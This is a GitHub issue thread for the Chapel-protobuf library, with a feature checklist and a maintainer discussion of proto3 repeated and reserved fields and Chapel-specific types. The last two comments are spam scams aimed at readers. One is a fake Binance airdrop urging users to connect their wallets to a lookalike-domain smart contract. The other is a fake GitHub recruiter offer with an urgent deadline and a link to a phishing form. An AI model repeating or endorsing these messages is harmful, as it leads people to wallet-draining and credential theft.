### ISSUE TITLE
Task checklist (Features/TODO)

### ISSUE THREAD

**Issue by Aniket21mathur** [Aniket21mathur/Chapel-protobuf#3]
Following is a possible task checklist for the library-

- [x] Write basic plugin modules in C++ for generating chapel code. (#2 )
- [x] Write scripts that set up the project. (#5 )
- [x] Set up a testing architecture for the library. (#10 )
- [x] Add support for serialization to byte order for individual `int32` and `int64` fields.(#8  )
- [x] Extend this support to have serialization and deserialization for an entire message or the[ Message type](https://developers.google.com/protocol-buffers/docs/encoding#structure) byte stream with key-value pairs.(#8  )
- [x] Add channel implementation for serialize/unserialize methods(#11 )
- [x] Work on how to handle the `package` specifier in Chapel. (#13 )
- [x] Add support for other proto field types- `DOUBLE`, `FLOAT`, `UINT64`, `FIXED64`, `FIXED32`, `BOOL` , `STRING` , `BYTES`, `UINT32`, `SFIXED32`, `SFIXED64`, `SINT32`, `SINT64`.(#11 )
- [x] Handle unknown fields (backward and forward compatibility) (#15 )
- [x] Add support for repeated/reserved fields.(#14 )
- [x] Add support for `enums`. (#20 )
- [x] Add support for using message types as fields. (#22 )
- [x] Add support for nested types. (#23 )
- [x] Add support for the `Any` message type. (#33 )
- [x] Add support for the `Oneof` field type.(#32  )
- [x] Add support for `Map`. (#24)
- [ ] Support `JSON` encoding.
- [x] Add documentation for the project(#16 , #30  )
- [ ] Extend message types to support `RPC` system?
- [ ] Support for Reflection based operations

**Comment by lydia-duncan** [comment]
> Add support for repeated/reserved fields.

Does this refer to optional vs required or is it something else entirely?

**Comment by lydia-duncan** [comment]
I think we'll also want to think about if we should generate both Chapel classes and Chapel records or if we should stick to just records (though definitely not right away).  And also ways of supporting types that are unique to Chapel, such as ranges and domains (and how we'd specify array fields either way).  Again, not an immediate thing to work on, just something to put on the list.

**Comment by Aniket21mathur** [comment]
> Does this refer to optional vs required or is it something else entirely?

No, they are something different. The optional/required specifiers were removed in `proto3`, that's why I didn't add those to the list. You can see -> [Why required and optional is removed in Protocol Buffers 3](https://stackoverflow.com/questions/31801257/why-required-and-optional-is-removed-in-protocol-buffers-3) :stuck_out_tongue: 

`repeated` allow us to repeat a message field any number of times.

`reserved` is used to reserve some field numeric values. From the official documentation ->


> If you update an enum type by entirely removing an enum entry, or commenting it out, future users can reuse the numeric value when making their own updates to the type. This can cause severe issues if they later load old versions of the same .proto, including data corruption, privacy bugs, and so on. One way to make sure this doesn't happen is to specify that the numeric values (and/or names, which can also cause issues for JSON serialization) of your deleted entries are reserved. The protocol buffer compiler will complain if any future users try to use these identifiers. You can specify that your reserved numeric value range goes up to the maximum possible value using the max keyword.

We don't have to do much for `reserved` I guess, the `protoc` compiler will take care of it.

**Comment by lydia-duncan** [comment]
> The optional/required specifiers were removed in proto3, that's why I didn't add those to the list.

Dang, they need to update their documentation page (or update the link that Google finds first)

**Comment by Aniket21mathur** [comment]
> I think we'll also want to think about if we should generate both Chapel classes and Chapel records or if we should stick to just records (though definitely not right away).

Yeah, that's something which needs more thinking and research I guess.

> And also ways of supporting types that are unique to Chapel, such as ranges and domains

I don't understand what exactly do you mean by that. The `.proto` files do not support `ranges`/`domain` types, and I think our job is to create reflection of `proto` types to `chapel` types?

> Dang, they need to update their documentation page (or update the link that Google finds first)

Yeah, they should :laughing:

**Comment by lydia-duncan** [comment]
>>    And also ways of supporting types that are unique to Chapel, such as ranges and domains
>
> I don't understand what exactly do you mean by that. The .proto files do not support ranges/domain types, and I think our job is to create reflection of proto types to chapel types?

Yeah, I figured as much.  But I think it would be reasonable for users starting from Chapel to want to use Chapel-unique types in ways that get translated appropriately to other languages, and so would want to have a way to represent them in the .proto files.  But maybe that's more the compiler interoperability story's job than the job of our protobuf implementation.  Do other languages have a way to specify types that are unique to them via protocol buffer files?

**Comment by lydia-duncan** [comment]
(It might be worth spawning this into a separate issue for discussion, so as not to have this one be too off topic)

**Comment by rajiur007** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @turboza, @myg133, @cnpryer, @ruvaag, @serg-plusplus, @TAnas0, @yazici

**Comment by cbuguenoIS** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](http://jobs.githubtalentcommunity.online/auth) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
RoaringPort, @PillarDevelopment, @5l1v3r1, @plinki, @girishramnani, @autsada, @charles-cty, @havafy, @zippoxer, @khzaw, @dit7ya, @xnzac, @kurocraft0312, @mishimalisa, @gautierdag, @wozuo, @digoburigo, @GrapeBaBa, @madeinfree, @stopyellingatme
